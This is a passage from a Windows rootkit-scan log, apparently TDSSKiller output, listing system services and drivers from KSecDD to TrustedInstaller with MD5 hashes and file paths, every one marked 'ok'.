18:04:08.0934 5696 [ 4A1445EFA932A3BAF5BDB02D7131EE20 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
18:04:08.0984 5696 KSecDD - ok
18:04:09.0064 5696 [ 8078F8F8F7A79E2E6B494523A828C585 ] KtmRm C:\Windows\system32\msdtckrm.dll
18:04:09.0124 5696 KtmRm - ok
18:04:09.0174 5696 [ 1BF5EEBFD518DD7298434D8C862F825D ] LanmanServer C:\Windows\system32\srvsvc.dll
18:04:09.0234 5696 LanmanServer - ok
18:04:09.0264 5696 [ 1DB69705B695B987082C8BAEC0C6B34F ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
18:04:09.0314 5696 LanmanWorkstation - ok
18:04:09.0334 5696 [ D1C5883087A0C3F1344D9D55A44901F6 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
18:04:09.0394 5696 lltdio - ok
18:04:09.0434 5696 [ 2D5A428872F1442631D0959A34ABFF63 ] lltdsvc C:\Windows\System32\lltdsvc.dll
18:04:09.0494 5696 lltdsvc - ok
18:04:09.0534 5696 [ 35D40113E4A5B961B6CE5C5857702518 ] lmhosts C:\Windows\System32\lmhsvc.dll
18:04:09.0584 5696 lmhosts - ok
18:04:09.0634 5696 [ A2262FB9F28935E862B4DB46438C80D2 ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
18:04:09.0654 5696 LSI_FC - ok
18:04:09.0664 5696 [ 30D73327D390F72A62F32C103DAF1D6D ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
18:04:09.0684 5696 LSI_SAS - ok
18:04:09.0694 5696 [ E1E36FEFD45849A95F1AB81DE0159FE3 ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
18:04:09.0714 5696 LSI_SCSI - ok
18:04:09.0754 5696 [ 23B55D27A0AFB7FE9CBCB20B617CC168 ] Ltn_stk7070P C:\Windows\system32\DRIVERS\Ltn_stk7070P.sys
18:04:09.0854 5696 Ltn_stk7070P - ok
18:04:09.0904 5696 [ 1FA7503D019291C027FEDAE509BC5500 ] Ltn_stkrc C:\Windows\system32\DRIVERS\Ltn_stkrc.sys
18:04:09.0964 5696 Ltn_stkrc - ok
18:04:09.0994 5696 [ 8F5C7426567798E62A3B3614965D62CC ] luafv C:\Windows\system32\drivers\luafv.sys
18:04:10.0024 5696 luafv - ok
18:04:10.0044 5696 [ D153B14FC6598EAE8422A2037553ADCE ] megasas C:\Windows\system32\drivers\megasas.sys
18:04:10.0064 5696 megasas - ok
18:04:10.0094 5696 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] MMCSS C:\Windows\system32\mmcss.dll
18:04:10.0154 5696 MMCSS - ok
18:04:10.0204 5696 [ E13B5EA0F51BA5B1512EC671393D09BA ] Modem C:\Windows\system32\drivers\modem.sys
18:04:10.0254 5696 Modem - ok
18:04:10.0304 5696 [ 0A9BB33B56E294F686ABB7C1E4E2D8A8 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
18:04:10.0354 5696 monitor - ok
18:04:10.0384 5696 [ 5BF6A1326A335C5298477754A506D263 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
18:04:10.0404 5696 mouclass - ok
18:04:10.0424 5696 [ 93B8D4869E12CFBE663915502900876F ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
18:04:10.0464 5696 mouhid - ok
18:04:10.0494 5696 [ BDAFC88AA6B92F7842416EA6A48E1600 ] MountMgr C:\Windows\system32\drivers\mountmgr.sys
18:04:10.0524 5696 MountMgr - ok
18:04:10.0614 5696 [ 51A84B690DF519DCF656F780243D953E ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
18:04:10.0654 5696 MozillaMaintenance - ok
18:04:10.0694 5696 [ 583A41F26278D9E0EA548163D6139397 ] mpio C:\Windows\system32\drivers\mpio.sys
18:04:10.0714 5696 mpio - ok
18:04:10.0744 5696 [ 22241FEBA9B2DEFA669C8CB0A8DD7D2E ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
18:04:10.0784 5696 mpsdrv - ok
18:04:10.0834 5696 [ 5DE62C6E9108F14F6794060A9BDECAEC ] MpsSvc C:\Windows\system32\mpssvc.dll
18:04:10.0874 5696 MpsSvc - ok
18:04:10.0894 5696 [ 4FBBB70D30FD20EC51F80061703B001E ] Mraid35x C:\Windows\system32\drivers\mraid35x.sys
18:04:10.0914 5696 Mraid35x - ok
18:04:10.0944 5696 [ 82CEA0395524AACFEB58BA1448E8325C ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
18:04:10.0974 5696 MRxDAV - ok
18:04:11.0004 5696 [ 1E94971C4B446AB2290DEB71D01CF0C2 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
18:04:11.0074 5696 mrxsmb - ok
18:04:11.0144 5696 [ 4FCCB34D793B116423209C0F8B7A3B03 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
18:04:11.0194 5696 mrxsmb10 - ok
18:04:11.0204 5696 [ C3CB1B40AD4A0124D617A1199B0B9D7C ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
18:04:11.0254 5696 mrxsmb20 - ok
18:04:11.0284 5696 [ 5457DCFA7C0DA43522F4D9D4049C1472 ] msahci C:\Windows\system32\drivers\msahci.sys
18:04:11.0304 5696 msahci - ok
18:04:11.0334 5696 [ 3FC82A2AE4CC149165A94699183D3028 ] msdsm C:\Windows\system32\drivers\msdsm.sys
18:04:11.0354 5696 msdsm - ok
18:04:11.0384 5696 [ FD7520CC3A80C5FC8C48852BB24C6DED ] MSDTC C:\Windows\System32\msdtc.exe
18:04:11.0424 5696 MSDTC - ok
18:04:11.0454 5696 [ A9927F4A46B816C92F461ACB90CF8515 ] Msfs C:\Windows\system32\drivers\Msfs.sys
18:04:11.0484 5696 Msfs - ok
18:04:11.0504 5696 [ 0F400E306F385C56317357D6DEA56F62 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
18:04:11.0514 5696 msisadrv - ok
18:04:11.0544 5696 [ 85466C0757A23D9A9AECDC0755203CB2 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
18:04:11.0594 5696 MSiSCSI - ok
18:04:11.0604 5696 msiserver - ok
18:04:11.0624 5696 [ D8C63D34D9C9E56C059E24EC7185CC07 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
18:04:11.0674 5696 MSKSSRV - ok
18:04:11.0704 5696 [ 1D373C90D62DDB641D50E55B9E78D65E ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
18:04:11.0737 5696 MSPCLOCK - ok
18:04:11.0743 5696 [ B572DA05BF4E098D4BBA3A4734FB505B ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
18:04:11.0791 5696 MSPQM - ok
18:04:11.0849 5696 [ B49456D70555DE905C311BCDA6EC6ADB ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
18:04:11.0886 5696 MsRPC - ok
18:04:11.0909 5696 [ E384487CB84BE41D09711C30CA79646C ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys
18:04:11.0925 5696 mssmbios - ok
18:04:11.0935 5696 [ 7199C1EEC1E4993CAF96B8C0A26BD58A ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
18:04:11.0984 5696 MSTEE - ok
18:04:12.0005 5696 [ 6A57B5733D4CB702C8EA4542E836B96C ] Mup C:\Windows\system32\Drivers\mup.sys
18:04:12.0027 5696 Mup - ok
18:04:12.0053 5696 [ E4EAF0C5C1B41B5C83386CF212CA9584 ] napagent C:\Windows\system32\qagentRT.dll
18:04:12.0097 5696 napagent - ok
18:04:12.0130 5696 [ 85C44FDFF9CF7E72A40DCB7EC06A4416 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
18:04:12.0158 5696 NativeWifiP - ok
18:04:12.0215 5696 [ 1357274D1883F68300AEADD15D7BBB42 ] NDIS C:\Windows\system32\drivers\ndis.sys
18:04:12.0249 5696 NDIS - ok
18:04:12.0270 5696 [ 0E186E90404980569FB449BA7519AE61 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
18:04:12.0315 5696 NdisTapi - ok
18:04:12.0341 5696 [ D6973AA34C4D5D76C0430B181C3CD389 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
18:04:12.0385 5696 Ndisuio - ok
18:04:12.0405 5696 [ 818F648618AE34F729FDB47EC68345C3 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
18:04:12.0453 5696 NdisWan - ok
18:04:12.0479 5696 [ 71DAB552B41936358F3B541AE5997FB3 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
18:04:12.0524 5696 NDProxy - ok
18:04:12.0543 5696 [ BCD093A5A6777CF626434568DC7DBA78 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
18:04:12.0576 5696 NetBIOS - ok
18:04:12.0607 5696 [ ECD64230A59CBD93C85F1CD1CAB9F3F6 ] netbt C:\Windows\system32\DRIVERS\netbt.sys
18:04:12.0664 5696 netbt - ok
18:04:12.0692 5696 [ A3E186B4B935905B829219502557314E ] Netlogon C:\Windows\system32\lsass.exe
18:04:12.0707 5696 Netlogon - ok
18:04:12.0739 5696 [ C8052711DAECC48B982434C5116CA401 ] Netman C:\Windows\System32\netman.dll
18:04:12.0799 5696 Netman - ok
18:04:12.0827 5696 [ 2EF3BBE22E5A5ACD1428EE387A0D0172 ] netprofm C:\Windows\System32\netprofm.dll
18:04:12.0878 5696 netprofm - ok
18:04:12.0913 5696 [ D6C4E4A39A36029AC0813D476FBD0248 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
18:04:12.0943 5696 NetTcpPortSharing - ok
18:04:13.0121 5696 [ 8DE67BD902095A13329FD82C85A1FA09 ] NETw5v32 C:\Windows\system32\DRIVERS\NETw5v32.sys
18:04:13.0474 5696 NETw5v32 - ok
18:04:13.0505 5696 [ 2E7FB731D4790A1BC6270ACCEFACB36E ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
18:04:13.0537 5696 nfrd960 - ok
18:04:13.0568 5696 [ 2997B15415F9BBE05B5A4C1C85E0C6A2 ] NlaSvc C:\Windows\System32\nlasvc.dll
18:04:13.0646 5696 NlaSvc - ok
18:04:13.0677 5696 [ D36F239D7CCE1931598E8FB90A0DBC26 ] Npfs C:\Windows\system32\drivers\Npfs.sys
18:04:13.0724 5696 Npfs - ok
18:04:13.0771 5696 [ 8BB86F0C7EEA2BDED6FE095D0B4CA9BD ] nsi C:\Windows\system32\nsisvc.dll
18:04:13.0786 5696 nsi - ok
18:04:13.0817 5696 [ 609773E344A97410CE4EBF74A8914FCF ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
18:04:13.0880 5696 nsiproxy - ok
18:04:13.0958 5696 [ 6A4A98CEE84CF9E99564510DDA4BAA47 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
18:04:14.0020 5696 Ntfs - ok
18:04:14.0067 5696 [ E875C093AEC0C978A90F30C9E0DFBB72 ] ntrigdigi C:\Windows\system32\drivers\ntrigdigi.sys
18:04:14.0114 5696 ntrigdigi - ok
18:04:14.0161 5696 [ C5DBBCDA07D780BDA9B685DF333BB41E ] Null C:\Windows\system32\drivers\Null.sys
18:04:14.0207 5696 Null - ok
18:04:14.0239 5696 [ E69E946F80C1C31C53003BFBF50CBB7C ] nvraid C:\Windows\system32\drivers\nvraid.sys
18:04:14.0254 5696 nvraid - ok
18:04:14.0285 5696 [ 9E0BA19A28C498A6D323D065DB76DFFC ] nvstor C:\Windows\system32\drivers\nvstor.sys
18:04:14.0301 5696 nvstor - ok
18:04:14.0317 5696 [ 07C186427EB8FCC3D8D7927187F260F7 ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
18:04:14.0332 5696 nv_agp - ok
18:04:14.0348 5696 NwlnkFlt - ok
18:04:14.0348 5696 NwlnkFwd - ok
18:04:14.0379 5696 [ BE32DA025A0BE1878F0EE8D6D9386CD5 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
18:04:14.0439 5696 ohci1394 - ok
18:04:14.0479 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2pimsvc C:\Windows\system32\p2psvc.dll
18:04:14.0569 5696 p2pimsvc - ok
18:04:14.0579 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2psvc C:\Windows\system32\p2psvc.dll
18:04:14.0609 5696 p2psvc - ok
18:04:14.0719 5696 [ 0FA9B5055484649D63C303FE404E5F4D ] Parport C:\Windows\system32\drivers\parport.sys
18:04:14.0809 5696 Parport - ok
18:04:14.0869 5696 [ B9C2B89F08670E159F7181891E449CD9 ] partmgr C:\Windows\system32\drivers\partmgr.sys
18:04:14.0889 5696 partmgr - ok
18:04:14.0899 5696 [ 4F9A6A8A31413180D0FCB279AD5D8112 ] Parvdm C:\Windows\system32\drivers\parvdm.sys
18:04:14.0959 5696 Parvdm - ok
18:04:14.0989 5696 [ C6276AD11F4BB49B58AA1ED88537F14A ] PcaSvc C:\Windows\System32\pcasvc.dll
18:04:15.0039 5696 PcaSvc - ok
18:04:15.0059 5696 [ 941DC1D19E7E8620F40BBC206981EFDB ] pci C:\Windows\system32\drivers\pci.sys
18:04:15.0119 5696 pci - ok
18:04:15.0149 5696 [ 3B1901E401473E03EB8C874271E50C26 ] pciide C:\Windows\system32\drivers\pciide.sys
18:04:15.0179 5696 pciide - ok
18:04:15.0199 5696 [ E6F3FB1B86AA519E7698AD05E58B04E5 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
18:04:15.0229 5696 pcmcia - ok
18:04:15.0279 5696 [ 6349F6ED9C623B44B52EA3C63C831A92 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
18:04:15.0409 5696 PEAUTH - ok
18:04:15.0499 5696 [ B1689DF169143F57053F795390C99DB3 ] pla C:\Windows\system32\pla.dll
18:04:15.0609 5696 pla - ok
18:04:15.0659 5696 [ C5E7F8A996EC0A82D508FD9064A5569E ] PlugPlay C:\Windows\system32\umpnpmgr.dll
18:04:15.0679 5696 PlugPlay - ok
18:04:15.0709 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPAutoReg C:\Windows\system32\p2psvc.dll
18:04:15.0739 5696 PNRPAutoReg - ok
18:04:15.0759 5696 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPsvc C:\Windows\system32\p2psvc.dll
18:04:15.0779 5696 PNRPsvc - ok
18:04:15.0849 5696 [ D0494460421A03CD5225CCA0059AA146 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
18:04:15.0909 5696 PolicyAgent - ok
18:04:15.0959 5696 [ ECFFFAEC0C1ECD8DBC77F39070EA1DB1 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
18:04:15.0999 5696 PptpMiniport - ok
18:04:16.0029 5696 [ 0E3CEF5D28B40CF273281D620C50700A ] Processor C:\Windows\system32\drivers\processr.sys
18:04:16.0099 5696 Processor - ok
18:04:16.0149 5696 [ 0508FAA222D28835310B7BFCA7A77346 ] ProfSvc C:\Windows\system32\profsvc.dll
18:04:16.0169 5696 ProfSvc - ok
18:04:16.0179 5696 [ A3E186B4B935905B829219502557314E ] ProtectedStorage C:\Windows\system32\lsass.exe
18:04:16.0199 5696 ProtectedStorage - ok
18:04:16.0239 5696 [ 99514FAA8DF93D34B5589187DB3AA0BA ] PSched C:\Windows\system32\DRIVERS\pacer.sys
18:04:16.0269 5696 PSched - ok
18:04:16.0329 5696 [ CCDAC889326317792480C0A67156A1EC ] ql2300 C:\Windows\system32\drivers\ql2300.sys
18:04:16.0389 5696 ql2300 - ok
18:04:16.0419 5696 [ 81A7E5C076E59995D54BC1ED3A16E60B ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
18:04:16.0439 5696 ql40xx - ok
18:04:16.0459 5696 [ E9ECAE663F47E6CB43962D18AB18890F ] QWAVE C:\Windows\system32\qwave.dll
18:04:16.0519 5696 QWAVE - ok
18:04:16.0549 5696 [ 9F5E0E1926014D17486901C88ECA2DB7 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
18:04:16.0569 5696 QWAVEdrv - ok
18:04:16.0589 5696 [ 147D7F9C556D259924351FEB0DE606C3 ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
18:04:16.0619 5696 RasAcd - ok
18:04:16.0649 5696 [ F6A452EB4CEADBB51C9E0EE6B3ECEF0F ] RasAuto C:\Windows\System32\rasauto.dll
18:04:16.0699 5696 RasAuto - ok
18:04:16.0739 5696 [ A214ADBAF4CB47DD2728859EF31F26B0 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
18:04:16.0789 5696 Rasl2tp - ok
18:04:16.0839 5696 [ 75D47445D70CA6F9F894B032FBC64FCF ] RasMan C:\Windows\System32\rasmans.dll
18:04:16.0883 5696 RasMan - ok
18:04:16.0915 5696 [ 509A98DD18AF4375E1FC40BC175F1DEF ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
18:04:16.0982 5696 RasPppoe - ok
18:04:16.0993 5696 [ 2005F4A1E05FA09389AC85840F0A9E4D ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
18:04:17.0038 5696 RasSstp - ok
18:04:17.0072 5696 [ B14C9D5B9ADD2F84F70570BBBFAA7935 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
18:04:17.0108 5696 rdbss - ok
18:04:17.0140 5696 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
18:04:17.0196 5696 RDPCDD - ok
18:04:17.0253 5696 [ E8BD98D46F2ED77132BA927FCCB47D8B ] rdpdr C:\Windows\system32\drivers\rdpdr.sys
18:04:17.0370 5696 rdpdr - ok
18:04:17.0379 5696 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
18:04:17.0422 5696 RDPENCDD - ok
18:04:17.0484 5696 [ C127EBD5AFAB31524662C48DFCEB773A ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
18:04:17.0550 5696 RDPWD - ok
18:04:17.0576 5696 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll
18:04:17.0612 5696 RemoteAccess - ok
18:04:17.0657 5696 [ 9E6894EA18DAFF37B63E1005F83AE4AB ] RemoteRegistry C:\Windows\system32\regsvc.dll
18:04:17.0703 5696 RemoteRegistry - ok
18:04:17.0735 5696 [ 6482707F9F4DA0ECBAB43B2E0398A101 ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
18:04:17.0767 5696 RFCOMM - ok
18:04:17.0792 5696 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe
18:04:17.0867 5696 RpcLocator - ok
18:04:17.0905 5696 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] RpcSs C:\Windows\system32\rpcss.dll
18:04:17.0943 5696 RpcSs - ok
18:04:17.0974 5696 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
18:04:18.0055 5696 rspndr - ok
18:04:18.0063 5696 [ A3E186B4B935905B829219502557314E ] SamSs C:\Windows\system32\lsass.exe
18:04:18.0082 5696 SamSs - ok
18:04:18.0130 5696 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
18:04:18.0159 5696 sbp2port - ok
18:04:18.0194 5696 [ 77B7A11A0C3D78D3386398FBBEA1B632 ] SCardSvr C:\Windows\System32\SCardSvr.dll
18:04:18.0250 5696 SCardSvr - ok
18:04:18.0308 5696 [ 1A58069DB21D05EB2AB58EE5753EBE8D ] Schedule C:\Windows\system32\schedsvc.dll
18:04:18.0402 5696 Schedule - ok
18:04:18.0417 5696 [ 312EC3E37A0A1F2006534913E37B4423 ] SCPolicySvc C:\Windows\System32\certprop.dll
18:04:18.0449 5696 SCPolicySvc - ok
18:04:18.0480 5696 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll
18:04:18.0558 5696 SDRSVC - ok
18:04:18.0573 5696 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
18:04:18.0651 5696 secdrv - ok
18:04:18.0683 5696 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll
18:04:18.0714 5696 seclogon - ok
18:04:18.0729 5696 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll
18:04:18.0776 5696 SENS - ok
18:04:18.0807 5696 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys
18:04:18.0885 5696 Serenum - ok
18:04:18.0917 5696 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
18:04:18.0982 5696 Serial - ok
18:04:19.0012 5696 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
18:04:19.0052 5696 sermouse - ok
18:04:19.0072 5696 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
18:04:19.0122 5696 SessionEnv - ok
18:04:19.0162 5696 [ 103B79418DA647736EE95645F305F68A ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
18:04:19.0222 5696 sffdisk - ok
18:04:19.0252 5696 [ 8FD08A310645FE872EEEC6E08C6BF3EE ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
18:04:19.0322 5696 sffp_mmc - ok
18:04:19.0342 5696 [ 9CFA05FCFCB7124E69CFC812B72F9614 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
18:04:19.0392 5696 sffp_sd - ok
18:04:19.0412 5696 [ 46ED8E91793B2E6F848015445A0AC188 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
18:04:19.0462 5696 sfloppy - ok
18:04:19.0482 5696 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll
18:04:19.0522 5696 SharedAccess - ok
18:04:19.0552 5696 [ C7230FBEE14437716701C15BE02C27B8 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
18:04:19.0582 5696 ShellHWDetection - ok
18:04:19.0612 5696 [ D2A595D6EEBEEAF4334F8E50EFBC9931 ] sisagp C:\Windows\system32\drivers\sisagp.sys
18:04:19.0632 5696 sisagp - ok
18:04:19.0642 5696 [ CEDD6F4E7D84E9F98B34B3FE988373AA ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys
18:04:19.0662 5696 SiSRaid2 - ok
18:04:19.0682 5696 [ DF843C528C4F69D12CE41CE462E973A7 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
18:04:19.0702 5696 SiSRaid4 - ok
18:04:19.0802 5696 [ 862BB4CBC05D80C5B45BE430E5EF872F ] slsvc C:\Windows\system32\SLsvc.exe
18:04:20.0502 5696 slsvc - ok
18:04:20.0532 5696 [ 6EDC422215CD78AA8A9CDE6B30ABBD35 ] SLUINotify C:\Windows\system32\SLUINotify.dll
18:04:20.0572 5696 SLUINotify - ok
18:04:20.0592 5696 [ 7B75299A4D201D6A6533603D6914AB04 ] Smb C:\Windows\system32\DRIVERS\smb.sys
18:04:20.0622 5696 Smb - ok
18:04:20.0662 5696 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
18:04:20.0682 5696 SNMPTRAP - ok
18:04:20.0732 5696 [ 50660E6B082A7BF86751A003C3BB5210 ] SNP2UVC C:\Windows\system32\DRIVERS\snp2uvc.sys
18:04:20.0822 5696 SNP2UVC - ok
18:04:20.0842 5696 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys
18:04:20.0861 5696 spldr - ok
18:04:20.0883 5696 [ 8554097E5136C3BF9F69FE578A1B35F4 ] Spooler C:\Windows\System32\spoolsv.exe
18:04:20.0926 5696 Spooler - ok
18:04:20.0960 5696 [ 41987F9FC0E61ADF54F581E15029AD91 ] srv C:\Windows\system32\DRIVERS\srv.sys
18:04:21.0002 5696 srv - ok
18:04:21.0034 5696 [ FF33AFF99564B1AA534F58868CBE41EF ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
18:04:21.0071 5696 srv2 - ok
18:04:21.0087 5696 [ 7605C0E1D01A08F3ECD743F38B834A44 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
18:04:21.0114 5696 srvnet - ok
18:04:21.0145 5696 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
18:04:21.0210 5696 SSDPSRV - ok
18:04:21.0249 5696 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys
18:04:21.0279 5696 ssmdrv - ok
18:04:21.0317 5696 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll
18:04:21.0379 5696 SstpSvc - ok
18:04:21.0414 5696 [ 5DE7D67E49B88F5F07F3E53C4B92A352 ] stisvc C:\Windows\System32\wiaservc.dll
18:04:21.0465 5696 stisvc - ok
18:04:21.0497 5696 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys
18:04:21.0514 5696 swenum - ok
18:04:21.0547 5696 [ F21FD248040681CCA1FB6C9A03AAA93D ] swprv C:\Windows\System32\swprv.dll
18:04:21.0602 5696 swprv - ok
18:04:21.0637 5696 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys
18:04:21.0655 5696 Symc8xx - ok
18:04:21.0667 5696 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys
18:04:21.0685 5696 Sym_hi - ok
18:04:21.0703 5696 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys
18:04:21.0722 5696 Sym_u3 - ok
18:04:21.0795 5696 [ 0E8676FB3BB95AA40FDF7A4A31018C8B ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
18:04:21.0874 5696 SynTP - ok
18:04:21.0917 5696 [ 9A51B04E9886AA4EE90093586B0BA88D ] SysMain C:\Windows\system32\sysmain.dll
18:04:21.0952 5696 SysMain - ok
18:04:21.0979 5696 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll
18:04:22.0010 5696 TabletInputService - ok
18:04:22.0048 5696 [ FD90A16CEB10D4FDAA00AAF39B8FF58F ] taphss C:\Windows\system32\DRIVERS\taphss.sys
18:04:22.0086 5696 taphss - ok
18:04:22.0118 5696 [ D7673E4B38CE21EE54C59EEEB65E2483 ] TapiSrv C:\Windows\System32\tapisrv.dll
18:04:22.0149 5696 TapiSrv - ok
18:04:22.0164 5696 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll
18:04:22.0196 5696 TBS - ok
18:04:22.0251 5696 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
18:04:22.0311 5696 Tcpip - ok
18:04:22.0331 5696 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys
18:04:22.0361 5696 Tcpip6 - ok
18:04:22.0391 5696 [ 608C345A255D82A6289C2D468EB41FD7 ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
18:04:22.0431 5696 tcpipreg - ok
18:04:22.0461 5696 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
18:04:22.0511 5696 TDPIPE - ok
18:04:22.0541 5696 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
18:04:22.0591 5696 TDTCP - ok
18:04:22.0631 5696 [ 76B06EB8A01FC8624D699E7045303E54 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
18:04:22.0661 5696 tdx - ok
18:04:22.0783 5696 [ 9F3E7CABE86BBDECA009DE291DB6D9E2 ] TeamViewer8 C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
18:04:22.0987 5696 TeamViewer8 - ok
18:04:23.0009 5696 [ 3CAD38910468EAB9A6479E2F01DB43C7 ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
18:04:23.0030 5696 TermDD - ok
18:04:23.0054 5696 [ BB95DA09BEF6E7A131BFF3BA5032090D ] TermService C:\Windows\System32\termsrv.dll
18:04:23.0108 5696 TermService - ok
18:04:23.0159 5696 [ C7230FBEE14437716701C15BE02C27B8 ] Themes C:\Windows\system32\shsvcs.dll
18:04:23.0264 5696 Themes - ok
18:04:23.0331 5696 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll
18:04:23.0408 5696 THREADORDER - ok
18:04:23.0437 5696 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll
18:04:23.0467 5696 TrkWks - ok
18:04:23.0502 5696 [ 97D9D6A04E3AD9B6C626B9931DB78DBA ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
18:04:23.0536 5696 TrustedInstaller - ok
